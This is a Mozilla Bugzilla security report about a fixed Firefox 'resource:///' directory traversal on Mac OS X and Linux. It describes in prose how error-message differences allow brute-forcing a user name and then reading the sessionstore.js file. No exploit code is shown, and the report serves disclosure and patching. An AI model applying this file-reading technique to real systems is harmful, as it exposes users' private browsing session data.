Resource Directory Traversal Vulnerability - Mac OS X and Linux Example

RESOLVED FIXED

Status

()

Core
Security
RESOLVED FIXED
9 years ago
9 years ago

People

(Reporter: Gregory Fleischer, Assigned: dveditz)

Tracking

({verified1.8.1.17, verified1.9.0.2})

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dupe 380994])

Attachments

(1 attachment)

(Reporter)

Description

9 years ago
User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

On Mac OS X and Linux, the "resource:///" directory traversal described in bug 394075 can be used to reach any file on the file system.

Because there is a different error returned for JavaScript for non-existent files versus files that have syntax errors, a brute-force attack could be mounted to determine the OS user name by attempting to source script files from their home directory.

If the operating system user name can be brute-forced (or otherwise determined) and the profile value determined through an information leak, the "sessionstore.js" file can be read if it is stored in the default location.


Reproducible: Always

Steps to Reproduce:
1.
2.
3.
(Reporter)

Comment 1

9 years ago
Created attachment 303195 [details]
Example that shows reading from sessionstore.js if username and profile value are known

If the OS user name and profile value can be determined, it is possible to read the sessionstore.js file.

Note also that different errors are returned for invalid (or unreachable) user name values compared to users that exist.
(Assignee)

Comment 2

9 years ago
This is basically a dupe of bug 380994, customized with a juicy target from flat-chrome traversal bug. Very clever attempt to read the salted profile name. Another way to get that name is sometimes it can be read from uncaught exceptions thrown by addon components (not code in chrome URIs which isn't going to help much, but accompanying javascript XPCOM components which will have file: URIs in the error).
Whiteboard: [sg:dupe 380994]
Assignee: nobody → dveditz
Component: Security → Security
Product: Firefox → Core
QA Contact: firefox → toolkit
(Assignee)

Comment 3

9 years ago
Fix for bug 380994 checked into 1.8 and 1.9.0 branches
Keywords: fixed1.8.1.17, fixed1.9.0.2
(Assignee)

Updated

9 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Verified on latest Mac/Linux build candidates for 20017 and 3.0.2 using test case in comment #1. When running the test case on 20016 and 3.0.1 I could see the contents my sessionstore.js file, on 20017 and 3.0.2 nothing happens.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Keywords: fixed1.8.1.17, fixed1.9.0.2 → verified1.8.1.17, verified1.9.0.2
(Assignee)

Updated

9 years ago
Group: core-security
(Assignee)

Comment 5

9 years ago
bug 380994 checked in:
http://hg.mozilla.org/mozilla-central/rev/6dad95d60106
http://hg.mozilla.org/mozilla-central/rev/1eccc541661c
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.